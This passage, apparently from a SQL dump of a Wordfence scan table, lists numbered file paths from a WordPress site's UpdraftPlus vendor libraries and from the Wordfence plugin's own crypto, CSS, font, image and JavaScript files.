tentObject.php'),(4701,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Resource/BaseResource.php'),(4702,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Resource/NovaResource.php'),(4703,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Resource/PersistentResource.php'),(4704,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Resource/ReadOnlyResource.php'),(4705,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/AbstractService.php'),(4706,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/Catalog.php'),(4707,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/CatalogItem.php'),(4708,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/CatalogService.php'),(4709,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/Endpoint.php'),(4710,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/NovaService.php'),(4711,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/ServiceBuilder.php'),(4712,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/Service/ServiceInterface.php'),(4713,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Identity/Constants/User.php'),(4714,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Identity/Resource/Role.php'),(4715,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Identity/Resource/Tenant.php'),(4716,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Identity/Resource/Token.php'),(4717,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Identity/Resource/User.php'),(4718,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Identity/Service.php'),(4719,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/AbstractService.php'),(4720,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/CDNService.php'),(4721,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Constants/Header.php'),(4722,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Constants/UrlType.php'),(4723,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Enum/ReturnType.php'),(4724,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Exception/BulkOperationException.php'),(4725,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Exception/ContainerException.php'),(4726,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Exception/ObjectNotFoundException.php'),(4727,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Exception/StreamException.php'),(4728,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Exception/UploadException.php'),(4729,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/AbstractContainer.php'),(4730,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/AbstractResource.php'),(4731,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/Account.php'),(4732,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/CDNContainer.php'),(4733,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/Container.php'),(4734,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/ContainerMetadata.php'),(4735,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Resource/DataObject.php'),(4736,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Service.php'),(4737,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/AbstractTransfer.php'),(4738,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/ConcurrentTransfer.php'),(4739,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/ConsecutiveTransfer.php'),(4740,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/ContainerMigration.php'),(4741,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/DirectorySync.php'),(4742,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/TransferBuilder.php'),(4743,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/TransferPart.php'),(4744,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/ObjectStore/Upload/TransferState.php'),(4745,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/OpenStack.php'),(4746,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Rackspace.php'),(4747,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Version.php'),(4748,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/php-opencloud.php'),(4749,'wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/phpunit.xml.dist'),(4750,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/CHANGELOG.md'),(4751,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/ContainerAwareEventDispatcher.php'),(4752,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php'),(4753,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcherInterface.php'),(4754,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/Debug/WrappedListener.php'),(4755,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/DependencyInjection/RegisterListenersPass.php'),(4756,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/Event.php'),(4757,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/EventDispatcher.php'),(4758,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/EventDispatcherInterface.php'),(4759,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/EventSubscriberInterface.php'),(4760,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/GenericEvent.php'),(4761,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/ImmutableEventDispatcher.php'),(4762,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/LICENSE'),(4763,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/README.md'),(4764,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/composer.json'),(4765,'wp-content/plugins/updraftplus/vendor/symfony/event-dispatcher/phpunit.xml.dist'),(4766,'wp-content/plugins/updraftplus/vendor/symfony/process/CHANGELOG.md'),(4767,'wp-content/plugins/updraftplus/vendor/symfony/process/Exception/ExceptionInterface.php'),(4768,'wp-content/plugins/updraftplus/vendor/symfony/process/Exception/InvalidArgumentException.php'),(4769,'wp-content/plugins/updraftplus/vendor/symfony/process/Exception/LogicException.php'),(4770,'wp-content/plugins/updraftplus/vendor/symfony/process/Exception/ProcessFailedException.php'),(4771,'wp-content/plugins/updraftplus/vendor/symfony/process/Exception/ProcessTimedOutException.php'),(4772,'wp-content/plugins/updraftplus/vendor/symfony/process/Exception/RuntimeException.php'),(4773,'wp-content/plugins/updraftplus/vendor/symfony/process/ExecutableFinder.php'),(4774,'wp-content/plugins/updraftplus/vendor/symfony/process/InputStream.php'),(4775,'wp-content/plugins/updraftplus/vendor/symfony/process/LICENSE'),(4776,'wp-content/plugins/updraftplus/vendor/symfony/process/PhpExecutableFinder.php'),(4777,'wp-content/plugins/updraftplus/vendor/symfony/process/PhpProcess.php'),(4778,'wp-content/plugins/updraftplus/vendor/symfony/process/Pipes/AbstractPipes.php'),(4779,'wp-content/plugins/updraftplus/vendor/symfony/process/Pipes/PipesInterface.php'),(4780,'wp-content/plugins/updraftplus/vendor/symfony/process/Pipes/UnixPipes.php'),(4781,'wp-content/plugins/updraftplus/vendor/symfony/process/Pipes/WindowsPipes.php'),(4782,'wp-content/plugins/updraftplus/vendor/symfony/process/Process.php'),(4783,'wp-content/plugins/updraftplus/vendor/symfony/process/ProcessBuilder.php'),(4784,'wp-content/plugins/updraftplus/vendor/symfony/process/ProcessUtils.php'),(4785,'wp-content/plugins/updraftplus/vendor/symfony/process/README.md'),(4786,'wp-content/plugins/updraftplus/vendor/symfony/process/composer.json'),(4787,'wp-content/plugins/updraftplus/vendor/symfony/process/phpunit.xml.dist'),(4788,'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),(4789,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),(4790,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),(4791,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),(4792,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),(4793,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),(4794,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),(4795,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),(4796,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),(4797,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),(4798,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),(4799,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),(4800,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),(4801,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),(4802,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),(4803,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),(4804,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),(4805,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),(4806,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),(4807,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),(4808,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),(4809,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),(4810,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),(4811,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),(4812,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),(4813,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),(4814,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),(4815,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),(4816,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),(4817,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),(4818,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),(4819,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),(4820,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),(4821,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(4822,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(4823,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),(4824,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(4825,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(4826,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(4827,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(4828,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(4829,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(4830,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),(4831,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),(4832,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),(4833,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),(4834,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),(4835,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),(4836,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),(4837,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(4838,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(4839,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(4840,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(4841,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(4842,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(4843,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(4844,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(4845,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(4846,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(4847,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(4848,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(4849,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(4850,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(4851,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(4852,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(4853,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(4854,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(4855,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(4856,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(4857,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(4858,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(4859,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(4860,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(4861,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(4862,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(4863,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(4864,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(4865,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(4866,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(4867,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(4868,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(4869,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(4870,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(4871,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(4872,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(4873,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(4874,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(4875,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(4876,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(4877,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(4878,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(4879,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(4880,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(4881,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(4882,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(4883,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(4884,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(4885,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(4886,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(4887,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(4888,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(4889,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(4890,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(4891,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(4892,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(4893,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(4894,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(4895,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(4896,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(4897,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(4898,'wp-content/plugins/wordfence/css/activity-report-widget.1592338782.css'),(4899,'wp-content/plugins/wordfence/css/diff.1592338782.css'),(4900,'wp-content/plugins/wordfence/css/dt_table.1592338782.css'),(4901,'wp-content/plugins/wordfence/css/fullLog.1592338782.css'),(4902,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(4903,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(4904,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(4905,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(4906,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(4907,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(4908,'wp-content/plugins/wordfence/css/iptraf.1592338782.css'),(4909,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1592338782.css'),(4910,'wp-content/plugins/wordfence/css/jquery-ui.min.1592338782.css'),(4911,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1592338782.css'),(4912,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1592338782.css'),(4913,'wp-content/plugins/wordfence/css/main.1592338782.css'),(4914,'wp-content/plugins/wordfence/css/phpinfo.1592338782.css'),(4915,'wp-content/plugins/wordfence/css/wf-adminbar.1592338782.css'),(4916,'wp-content/plugins/wordfence/css/wf-colorbox.1592338782.css'),(4917,'wp-content/plugins/wordfence/css/wf-font-awesome.1592338782.css'),(4918,'wp-content/plugins/wordfence/css/wf-global.1592338782.css'),(4919,'wp-content/plugins/wordfence/css/wf-ionicons.1592338782.css'),(4920,'wp-content/plugins/wordfence/css/wf-onboarding.1592338782.css'),(4921,'wp-content/plugins/wordfence/css/wf-roboto-font.1592338782.css'),(4922,'wp-content/plugins/wordfence/css/wfselect2.min.1592338782.css'),(4923,'wp-content/plugins/wordfence/css/wordfenceBox.1592338782.css'),(4924,'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff'),(4925,'wp-content/plugins/wordfence/fonts/ionicons.woff'),(4926,'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff'),(4927,'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff'),(4928,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff'),(4929,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff'),(4930,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff'),(4931,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff'),(4932,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff'),(4933,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff'),(4934,'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff'),(4935,'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff'),(4936,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(4937,'wp-content/plugins/wordfence/images/2fa1.svg'),(4938,'wp-content/plugins/wordfence/images/2fa2.svg'),(4939,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(4940,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(4941,'wp-content/plugins/wordfence/images/blocking.svg'),(4942,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(4943,'wp-content/plugins/wordfence/images/checkbox.png'),(4944,'wp-content/plugins/wordfence/images/flags.png'),(4945,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(4946,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(4947,'wp-content/plugins/wordfence/images/help.png'),(4948,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(4949,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(4950,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(4951,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(4952,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(4953,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(4954,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(4955,'wp-content/plugins/wordfence/images/icons/email_go.png'),(4956,'wp-content/plugins/wordfence/images/icons/error128.png'),(4957,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(4958,'wp-content/plugins/wordfence/images/icons/tick128.png'),(4959,'wp-content/plugins/wordfence/images/icons/warning128.png'),(4960,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(4961,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(4962,'wp-content/plugins/wordfence/images/loading.gif'),(4963,'wp-content/plugins/wordfence/images/loading_background.png'),(4964,'wp-content/plugins/wordfence/images/loading_large.gif'),(4965,'wp-content/plugins/wordfence/images/logo.png'),(4966,'wp-content/plugins/wordfence/images/options.svg'),(4967,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(4968,'wp-content/plugins/wordfence/images/sort_asc.gif'),(4969,'wp-content/plugins/wordfence/images/sort_asc.png'),(4970,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(4971,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(4972,'wp-content/plugins/wordfence/images/sort_both.gif'),(4973,'wp-content/plugins/wordfence/images/sort_both.png'),(4974,'wp-content/plugins/wordfence/images/sort_desc.gif'),(4975,'wp-content/plugins/wordfence/images/sort_desc.png'),(4976,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(4977,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(4978,'wp-content/plugins/wordfence/images/support.svg'),(4979,'wp-content/plugins/wordfence/images/tools.svg'),(4980,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(4981,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(4982,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(4983,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(4984,'wp-content/plugins/wordfence/index.php'),(4985,'wp-content/plugins/wordfence/js/Chart.bundle.min.1592338782.js'),(4986,'wp-content/plugins/wordfence/js/admin.1592338782.js'),(4987,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1592338782.js'),(4988,'wp-content/plugins/wordfence/js/admin.liveTraffic.1592338782.js'),(4989,'wp-content/plugins/wordfence/js/date.1592338782.js'),(4990,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1592338782.js'),(4991,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1592338782.js'),(4992,'wp-content/plugins/wordfence/js/jquery.colorbox.1592338782.js'),(4993,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1592338782.js'),(4994,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1592338782.js'),(4995,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1592338782.js'),(4996,'wp-content/plugins/wordfence/js/jquery.tools.min.1592338782.js'),(4997,'wp-content/plugins/wordfence/js/knockout-3.3.0.1592338782.js'),(4998,'wp-content/plugins/wordfence/js/wfdashboard.1592338782.js'),(4999,'wp-content/plugins/wordfence/js/wfdropdown.1592338782.js'),(5000,'wp-content/plugins/wordfence/js/wfglobal.1592338782.js'),(5001,'wp-content/plugins/wordfence/js/wfpopover.1592338782.js'),(5002,'wp-content/plugins/wordfence/js/wfselect2.min.1592338782.js'),(5003,'wp-content/plugins/wordfence/lib/.htaccess'),(5004,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(5005,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(5006,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(5007,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(5008,'wp-content/plugins/wordfence/lib/Diff.php'),(5009,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(5010,'wp-content/plugins/wordfence/lib/IPTraf.php'),(5011,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(5012,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(5013,'wp-content/plugins/wordfence/lib/compat.php'),(5014,'wp-content/plugins/wordfence/lib/conntest.php'),(5015,'wp-content/plugins/w